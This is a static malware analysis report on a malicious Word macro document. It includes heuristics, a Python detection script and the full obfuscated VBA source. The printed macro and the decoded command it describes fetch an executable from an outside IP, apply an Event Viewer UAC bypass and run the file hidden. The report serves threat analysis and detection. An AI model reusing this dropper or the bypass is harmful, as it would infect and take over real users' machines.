Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cf0ee89b626684ed…

MALICIOUS

Office (OLE)

Size: 116.5 KB
Created: 2017-01-19 23:05:00
Authoring application: Microsoft Office Word
First seen: 2017-03-27
MD5: 9a9f84d7ade2e2802c1b2b584b668046
SHA-1: 50cbcc74be34dd64095386c29700630b42c2a7f1
SHA-256: cf0ee89b626684ed9f9f60823531dd1ed38cfd46395036209a274cadaf123575
Risk score: 250

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word document carrying an obfuscated VBA macro. `Document_Open` fires as soon as the document is opened with macros enabled and calls `Module1.gvczjyuuksghiwm`. That function instantiates `CreateObject(ThisDocument.acidclaim() & "HEll")`, which evaluates to the split, mixed-case ProgID `wScrIPt.sHEll`; ProgID lookup is case-insensitive, so this is `WScript.Shell`. It then invokes the object's `Run` method indirectly through `CallByName(obj, "run", 345 / 345, cmd, False)`: the method name comes from `ThisDocument.zkviqqydjwx()`, `345 / 345` evaluates to 1 (`vbMethod`), and the trailing `False` becomes `Run`'s window-style argument (0, hidden window). The command line is stored as three junk-padded literals in `qtrvojnii`; `ThisDocument.forestliberty` rebuilds it by passing each character through `Module1.dealjump`, which drops any character found in the alphabet `"VVjZZj6Vj66q"` (case-sensitively, because the `Like` comparison runs under VBA's default binary compare). Applying that filter to the literals yields a `cmd.exe /c` line that (1) runs `powershell.exe -windowstyle hidden -noprofile -executionpolicy bypass` with `(New-Object System.Net.WebClient).DownloadFile(...)` to fetch `hxxp://185.145.129[.]70/ini.xyz` into `%TEMP%\inifile.exe`, (2) sets `HKCU\Software\Classes\mscfile\shell\open\command` to that path with `reg add` and launches `eventvwr.exe`, the auto-elevating Event Viewer UAC bypass, (3) sleeps with `PING -n 15 127.0.0.1` and (4) runs the dropped file directly. After launching the command, the macro selects and deletes every shape in the document (`ActiveDocument.Shapes.SelectAll` / `Selection.Delete`), removing the lure graphic. The hundreds of unused `Dim` assignments, `If` blocks whose bodies only assign unused locals, and random comments are padding to defeat hash and string signatures. Beyond the techniques listed above, the decoded command maps to T1059.001 (PowerShell), T1105 (Ingress Tool Transfer) and T1548.002 (Bypass User Account Control). ClamAV's `Doc.Macro.ObfuscatedObj-6171960-0` signature corroborates the static findings.

Heuristics 8

  • ClamAV: Doc.Macro.ObfuscatedObj-6171960-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedObj-6171960-0
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function gvczjyuuksghiwm()
    Set dkdtwfqkuhyi = CreateObject(ThisDocument.acidclaim() & "HEll")
    Dim ggajinzielfae As Double
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    End If
    Call CallByName(dkdtwfqkuhyi, ThisDocument.zkviqqydjwx(), 345 / 345, ThisDocument.forestliberty(qtrvojnii), sqplgfyldylyovx)
    'slowtwelvepwkmvujvatykrvnotb
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Document_Open()
    Dim dropridge As Integer
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is Office's own DrawingML namespace URI, present in any document that contains drawing objects; it is not an indicator of compromise.
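The heuristics above are token checks over the decoded VBA source. The following is an added example, not the report's own tooling, that applies the same categories (reusing the report's rule ids) to an abridged copy of the extracted macro and adds two checks a reviewer would want for this sample: a ProgID reassembled from split string literals (`"wScrIPt.s" & "HEll"`) and the per-character `Not "..." Like "*" & ch & "*"` junk filter. The `VBA_LIKE_CHARFILTER` rule id, the regexes and the abridged sample are this example's own assumptions.

```python
import re
from itertools import permutations

# Constructed input: the execution-relevant lines of the extracted macro,
# with the padding (unused Dim/If blocks and junk comments) removed.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
Public Sub Document_Open()
Module1.gvczjyuuksghiwm
ActiveDocument.Shapes.SelectAll
Selection.Delete
End Sub
Function zkviqqydjwx()
zkviqqydjwx = "run"
End Function
Function acidclaim()
acidclaim = "wScrIPt.s"
End Function
Attribute VB_Name = "Module1"
Function gvczjyuuksghiwm()
Set dkdtwfqkuhyi = CreateObject(ThisDocument.acidclaim() & "HEll")
Call CallByName(dkdtwfqkuhyi, ThisDocument.zkviqqydjwx(), 345 / 345, ThisDocument.forestliberty(qtrvojnii), sqplgfyldylyovx)
End Function
Function dealjump(dealgarment)
If Not "VVjZZj6Vj66q" Like "*" & dealgarment & "*" Then
dealjump = dealgarment
Else
dealjump = ""
End If
End Function
'''

AUTOEXEC = ("document_open", "autoopen", "auto_open", "autoexec",
            "workbook_open", "document_close", "autoclose")
KNOWN_PROGIDS = ("wscript.shell", "shell.application", "msxml2.xmlhttp",
                 "microsoft.xmlhttp", "adodb.stream", "scripting.filesystemobject")

# (rule id, severity, regex).  Rule ids follow the report; the patterns are this script's.
LINE_RULES = [
    ("OLE_VBA_DOCOPEN", "low",
     re.compile(r"^\s*(?:public\s+|private\s+)?sub\s+(?:%s)\b" % "|".join(AUTOEXEC), re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_CALLBYNAME", "high", re.compile(r"\bCallByName\s*\(", re.I)),
    ("SC_STR_WSCRIPT", "high", re.compile(r"wscript", re.I)),
    # Per-character junk filter:  Not "<alphabet>" Like "*" & ch & "*"   (hypothetical rule id)
    ("VBA_LIKE_CHARFILTER", "medium",
     re.compile(r'\bNot\s+"[^"]+"\s+Like\s+"\*"\s*&\s*\w+\s*&\s*"\*"', re.I)),
]
STRING_LITERAL = re.compile(r'"([^"\r\n]*)"')
EXEC_RULES = {"OLE_VBA_CREATEOBJ", "OLE_VBA_CALLBYNAME", "SC_STR_WSCRIPT"}


def scan_lines(src):
    """Return (rule_id, severity, line_no, line) for every rule that fires."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        if line.lstrip().startswith("'"):      # whole-line VBA comment
            continue
        for rule_id, sev, rx in LINE_RULES:
            if rx.search(line):
                hits.append((rule_id, sev, no, line.strip()))
    return hits


def split_progids(src, max_parts=3):
    """Recover known ProgIDs that only exist once 2..max_parts string literals
    are concatenated (here "wScrIPt.s" & "HEll").  Literals are first pruned to
    those that are a substring of some known ProgID so the permutation search
    stays small on real, literal-heavy macros."""
    lits = [m.group(1) for m in STRING_LITERAL.finditer(src) if m.group(1)]
    cands = [s for s in lits if any(s.lower() in p for p in KNOWN_PROGIDS)]
    found = []
    for n in range(2, max_parts + 1):
        for combo in permutations(cands, n):
            joined = "".join(combo).lower()
            if joined in KNOWN_PROGIDS and (joined, combo) not in found:
                found.append((joined, combo))
    return found


def triage(src):
    hits = scan_lines(src)
    fired = {h[0] for h in hits}
    return {
        "hits": hits,
        "split_progids": split_progids(src),
        # Mirrors OLE_VBA_PCODE_AUTOEXEC_EXEC: auto-exec entry point plus object execution.
        "autoexec_with_exec": "OLE_VBA_DOCOPEN" in fired and bool(fired & EXEC_RULES),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for rule_id, sev, no, line in result["hits"]:
        print(f"{sev:<7} {rule_id:<22} line {no}: {line}")
    for progid, parts in result["split_progids"]:
        print(f"split ProgID {progid!r} from {parts}")
    print("auto-exec + execution:", result["autoexec_with_exec"])
```

The split-ProgID check is what a plain `WScript.Shell` string rule misses: neither literal contains the full ProgID, and the join happens across two modules at run time. The pruning step matters on real samples, where a macro like this one carries dozens of decoy literals (`"employkeen"`, `"jobvanish"`, ...) that would otherwise blow up the permutation search.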

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  10199 bytes
SHA-256: 0ee55d11f5a7f2f0eb635b821a29a37b294535f58a9293bdb1d0d478218031f6
Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim dropridge As Integer
dropridge = 49
Dim detailten As Double
detailten = 26
Dim allowbattle As Boolean
allowbattle = 47
Dim ayjigmbtjn As Long
ayjigmbtjn = 27
Module1.gvczjyuuksghiwm
Dim addictdesk As Boolean
addictdesk = 230
If addictdesk > 89 Then
'jvwqildzegaxqaxrkscwvzapdccenuqux
Dim addictbarrel As Integer
addictbarrel = 16
Dim wcwsalmaw As String
wcwsalmaw = "employkeen"
Dim fxaqvthifk As String
fxaqvthifk = "cfcfbqcpikqilgui"
Dim rzrljiyslsakqni As Long
rzrljiyslsakqni = 55
End If
'donoressencepublictide
Dim ljwobpesrapniuvtjb As Double
ljwobpesrapniuvtjb = 111
If ljwobpesrapniuvtjb <> 199 Then
'behavegroceryeitherhazard
Dim augustreward As String
augustreward = "jobvanish"
Dim applespirit As Integer
applespirit = 209
End If
ActiveDocument.Shapes.SelectAll
'mandaterallyalmvzjqegcc
Dim dvbeufjlzqbzxx As Boolean
dvbeufjlzqbzxx = 30
Dim ubjnzxkgfiyzbvef As Boolean
ubjnzxkgfiyzbvef = 189
Dim nfyjshcwirgwtbloexu As Long
nfyjshcwirgwtbloexu = 234
Dim biologytogether As Boolean
biologytogether = 95
Selection.Delete
End Sub
Function forestliberty(abandonstereo)
qpvbwthqjg = ""
Dim rpkbftvqi As Double
rpkbftvqi = 65
If rpkbftvqi <> 108 Then
'eccuuvynhzpsralhsapewvwfobrrr
Dim hxmzjdplyuhplwhbptq As Double
hxmzjdplyuhplwhbptq = 234
Dim birdboard As Byte
birdboard = 168
End If
For sfutmxwtovtvcfb = 1 To Len(abandonstereo)
'crowdexhibitsmaecgleoaj
Dim pggtnucdf As Boolean
pggtnucdf = 187
If pggtnucdf < 219 Then
Dim romancetreat As String
romancetreat = "hornrain"
Dim erotidcqk As Integer
erotidcqk = 202
Dim possiblesight As Boolean
possiblesight = 117
End If
'jzoieqsuzmlurjtrzkbridgeoriginal
Dim collectobscure As Long
collectobscure = 153
If collectobscure = 3 Then
Dim yoddnhsvw As Byte
yoddnhsvw = 63
Dim mailneed As String
mailneed = "increaseridge"
Dim dosegeneral As Integer
dosegeneral = 254
Dim situatesoon As Byte
situatesoon = 147
Dim believepotato As Long
believepotato = 110
End If
askcapital = Mid(abandonstereo, sfutmxwtovtvcfb, 1)
'ueuyluvfsjagadgetsteel
Dim practicethrive As Double
practicethrive = 114
If practicethrive <> 139 Then
Dim qutakyawzzujzwuun As Byte
qutakyawzzujzwuun = 139
Dim wvisjgckz As Long
wvisjgckz = 162
Dim owplxoctkzyfmqa As Byte
owplxoctkzyfmqa = 178
End If
'pwdxezytgtycmslzrjhahigeymgd
Dim donkeypenalty As Boolean
donkeypenalty = 233
If donkeypenalty = 14 Then
Dim xbuytwnji As Boolean
xbuytwnji = 52
Dim hopelicense As Long
hopelicense = 30
Dim uxthmphdu As Byte
uxthmphdu = 6
Dim ezodhivrlv As Byte
ezodhivrlv = 221
Dim adaptmarine As Byte
adaptmarine = 111
End If
qpvbwthqjg = qpvbwthqjg & Module1.dealjump(askcapital)
Dim kynuwwwjxcrdyjrtk As Long
kynuwwwjxcrdyjrtk = 192
If kynuwwwjxcrdyjrtk < 30 Then
Dim pcrhtivzotowtghle As Long
pcrhtivzotowtghle = 96
Dim cwhrhlgmzhsso As Integer
cwhrhlgmzhsso = 41
Dim wbgptlphpaihjpmwq As String
wbgptlphpaihjpmwq = "qiglbrpllrnnhgpob"
Dim genrehour As String
genrehour = "imbiqxxgxveasksm"
End If
'feverjuniorwmaissxzibyayoqjwd
Dim nrifsktanynoeubczn As Double
nrifsktanynoeubczn = 108
If nrifsktanynoeubczn = 160 Then
Dim zhmwllzitjtmrnne As Long
zhmwllzitjtmrnne = 195
Dim djepsklcw As Boolean
djepsklcw = 66
Dim potteryrandom As Integer
potteryrandom = 109
Dim tveeqfpjmc As Long
tveeqfpjmc = 15
End If
Next
Dim fuzaclydeicdprwwhkz As Long
fuzaclydeicdprwwhkz = 23
If fuzaclydeicdprwwhkz = 207 Then
'xvprhxyghyhskobddedymprib
Dim marchunknown As Boolean
marchunknown = 87
Dim tenweird As Boolean
tenweird = 5
Dim garlicvacuum As Double
garlicvacuum = 54
End If
forestliberty = qpvbwthqjg
'rehbpfoudahbdqgbqorgansay
Dim jelejlnhefdmun As Double
jelejlnhefdmun = 230
Dim cwdyvtaxtbdahurlukl As Long
cwdyvtaxtbdahurlukl = 231
Dim executeladder As Double
executeladder = 99
Dim crumblevillage As Byte
crumblevillage = 28
End Function
Function zkviqqydjwx()
'clipgorillabasesix
Dim dustmetal As String
dustmetal = "seriesspeak"
Dim lgnvafdntdalwu As Byte
lgnvafdntdalwu = 121
Dim pilwsyxwqkpevjayy As String
pilwsyxwqkpevjayy = "eqpgvrtchukltsqnrdw"
zkviqqydjwx = "run"
End Function
Function acidclaim()
acidclaim = "wScrIPt.s"
End Function


Attribute VB_Name = "Module1"
Function gvczjyuuksghiwm()
Set dkdtwfqkuhyi = CreateObject(ThisDocument.acidclaim() & "HEll")
Dim ggajinzielfae As Double
ggajinzielfae = 69
If ggajinzielfae < 228 Then
'zpshqbsnyaxwhnyyhqmuststay
Dim awayearly As Long
awayearly = 28
Dim unveiluse As Boolean
unveiluse = 41
Dim keysurvey As Long
keysurvey = 96
Dim pettwo As Integer
pettwo = 138
Dim objectpatient As Long
objectpatient = 120
End If

'josbelmyvqqrabbitstable
Dim pelicanshop As Integer
pelicanshop = 101
If pelicanshop < 100 Then
'gadgetlizardneswtthzvncpg
Dim fjwivnzwqvqghqgs As Byte
fjwivnzwqvqghqgs = 2
Dim namepause As Byte
namepause = 108
Dim jlnpfmakqtafumpmcby As Integer
jlnpfmakqtafumpmcby = 225
Dim acgfnfiwxjgqolpsfb As Integer
acgfnfiwxjgqolpsfb = 177
Dim ilareztejtfdosixdj As String
ilareztejtfdosixdj = "hobbyunfold"
End If
'fgywibenqanlljfalhetidrrribtfsseo
Dim jzaorzdmwzmp As Long
jzaorzdmwzmp = 81
If jzaorzdmwzmp = 212 Then
Dim egrmpomsnx As Double
egrmpomsnx = 104
Dim bitterslim As Boolean
bitterslim = 37
Dim allowignore As Integer
allowignore = 75
Dim acqmuhmtxky As String
acqmuhmtxky = "tkaelxwjxwia"
End If
sqplgfyldylyovx = False
'jysuztblnzdsoclucjsentenceskin
Dim alcoholdynamic As Integer
alcoholdynamic = 181
If alcoholdynamic <> 128 Then
'vfdashtxnqbtqwqqgravityowner
Dim angersubmit As Double
angersubmit = 112
Dim slotwear As Byte
slotwear = 28
Dim executepeanut As Byte
executepeanut = 3
Dim gloveteach As Integer
gloveteach = 254
Dim wrwczanhuhaxt As Byte
wrwczanhuhaxt = 224
End If
qtrvojnii = "ZVC6mZjdVq.VeVZX6eVV 6/jjc6 6p6qoZZWVeVjr66sVh6VEjljjL6j.6Ej6xqeV Z-6VwqiVNjqdjoqw6SjjT6jY6l6eVj jhjZij6djd6Ve6N6 j-6NVjojPVRjOVfZViZlV6E6 Zj-Ze66XjEjc6UVTV6I6qoV6nVVp6OZlZIZC6jYV VVb66Y66PjAjjsV6sV 6(6ZNjjE6Zwq-6OjZBjJjVeZ6CZVt6 VSVYjSV6TjZejmZ.VNZVEqTj.Z6WqE6bjjCjVlqVIZEZnVT6j)66.jDVVoZWqNVqLjZo6aZ6DVF6jiqLVEZV(" & "qV'j6hqjt6tVpVj:jV/j/V16Z8Vq5j.V1j465j.q162qZ9j.q7V06V/Vji6Znqjij.Zjx6VyZZzj'Z,jZ'V%VTVZEq6MVP6%ZV\Z\qjijnVijfjijlVeV6.je6Vx6qej'jZ)Z jV&VZ jVrVeVgjj 6a6dZdVV jjHjjKZVCqUj\V\6ZSZoVfqVt6wja6r6eVZ\V\ZCVVlZa6VsjZs"
'exerciserangeoasjyrvunxbqeceo
Dim cointoday As Integer
cointoday = 10
If cointoday = 96 Then
'xvjitozskhjiyhitcgnmowbitpms
Dim rejbecwbcqsiguvvoxg As Byte
rejbecwbcqsiguvvoxg = 113
Dim forestswift As String
forestswift = "oiltunnel"
End If
Dim oxwddigmcjtypzk As Boolean
oxwddigmcjtypzk = 213
Dim customisland As Boolean
customisland = 67
Dim littlenation As Long
littlenation = 212
qtrvojnii = qtrvojnii & "jVej6sZ6\V6\q6mVVsjZcZ6fZVijql6jeZ\V\qs6hqVeZlVVlV6\6V\ZoZjp6qeVnVq\qZ\VcVjo6mV6mZaV6njVdZ6 j/V6dj 6%jVTVjEqVM66PZj%6V\q6\jji6nVqiVZf6qiqZlVeVq.VeZxZje6 6q/Vjf6V 66&Vq jejZv6eVZnjtjvZ6w6r6Z.6jeZxV6ejj V&6 6PZIZjNZqGZj q-jVnZ ZZ1656 ZZ16q2j7j6.606.660jV.j1Z>jnqVu6l6 V&Zj 6%6jTjEjMZZPjZ%VV\6q\qiVnVZiVfVqijVlj6e6j.jejxVVe"
Dim fbgnlfqjvcwtwznbvn As Long
fbgnlfqjvcwtwznbvn = 42
If fbgnlfqjvcwtwznbvn <> 119 Then
'kmidbzvspznjclyafraidbrave
Dim mhxteyressctlfftx As String
mhxteyressctlfftx = "hcjdvpaoargxblszeot"
Dim cfjmkayedgeuulkqri As Long
cfjmkayedgeuulkqri = 78
Dim describeokay As Long
describeokay = 94
Dim tmluoulgdunyngkkin As Byte
tmluoulgdunyngkkin = 163
End If
Call CallByName(dkdtwfqkuhyi, ThisDocument.zkviqqydjwx(), 345 / 345, ThisDocument.forestliberty(qtrvojnii), sqplgfyldylyovx)
'slowtwelvepwkmvujvatykrvnotb
Dim cutepanel As Long
cutepanel = 54
Dim latinmerit As Boolean
latinmerit = 140
Dim canoeswarm As Integer
canoeswarm = 220
Dim xheducuqke As Integer
xheducuqke = 114
End Function
Function dealjump(dealgarment)
Dim melclxurhqmjlc As Double
melclxurhqmjlc = 102
Dim celeryready As String
celeryready = "ezxathpbfekjdllrkp"
Dim cancelrural As Boolean
cancelrural = 77
Dim ownerweasel As Double
ownerweasel = 104
Dim gloryrun As Double
gloryrun = 131
'xadvghhzbkikdaxeruptillness
Dim privatesalad As Boolean
privatesalad = 92
Dim hobbyshuffle As Boolean
hobbyshuffle = 53
If Not "VVjZZj6Vj66q" Like "*" & dealgarment & "*" Then
'decoratedoubleapproveleisure
Dim considerpudding As Integer
considerpudding = 11
If considerpudding < 116 Then
Dim hldxrakkeyoc As Long
hldxrakkeyoc = 135
Dim ikdqjnwpxjyk As Byte
ikdqjnwpxjyk = 151
Dim dinosaurunknown As Long
dinosaurunknown = 14
End If
Dim jarrack As Integer
jarrack = 175
If jarrack = 238 Then
'damagepizzafewspawn
Dim vrxusaldi As Double
vrxusaldi = 112
Dim heavyparade As String
heavyparade = "lwmdhqgymtasp"
Dim kmkkgkpskbshvvxrihw As String
kmkkgkpskbshvvxrihw = "sentencevisa"
Dim pistoltaste As Integer
pistoltaste = 15
Dim rallytrust As Integer
rallytrust = 110
End If
dealjump = dealgarment
'essencesatoshishedsweet
Dim evolveprint As Integer
evolveprint = 23
If evolveprint > 55 Then
Dim euxowwferjgylmwz As Boolean
euxowwferjgylmwz = 211
Dim couchkid As Byte
couchkid = 15
Dim findgap As String
findgap = "liarunusual"
End If
Else
dealjump = ""
'apologychairhicbjcswoie
Dim antennanotice As Long
antennanotice = 79
Dim mubwlgslcdwxscz As Integer
mubwlgslcdwxscz = 21
Dim awlojdnmupdfx As Boolean
awlojdnmupdfx = 31
Dim deliverfinish As Double
deliverfinish = 51
End If
Dim iibesulypmzja As Boolean
iibesulypmzja = 121
Dim shpfjtounid As Integer
shpfjtounid = 204
Dim lessonsiren As Integer
lessonsiren = 79
Dim qzuelfxfceipahsyhwq As Integer
qzuelfxfceipahsyhwq = 160
'airanklepatrolpink
Dim forcehammer As Double
forcehammer = 6
If forcehammer < 214 Then
Dim hardthen As Integer
hardthen = 238
Dim littlesmoke As Boolean
littlesmoke = 253
Dim measurepeanut As Double
measurepeanut = 157
End If
End Function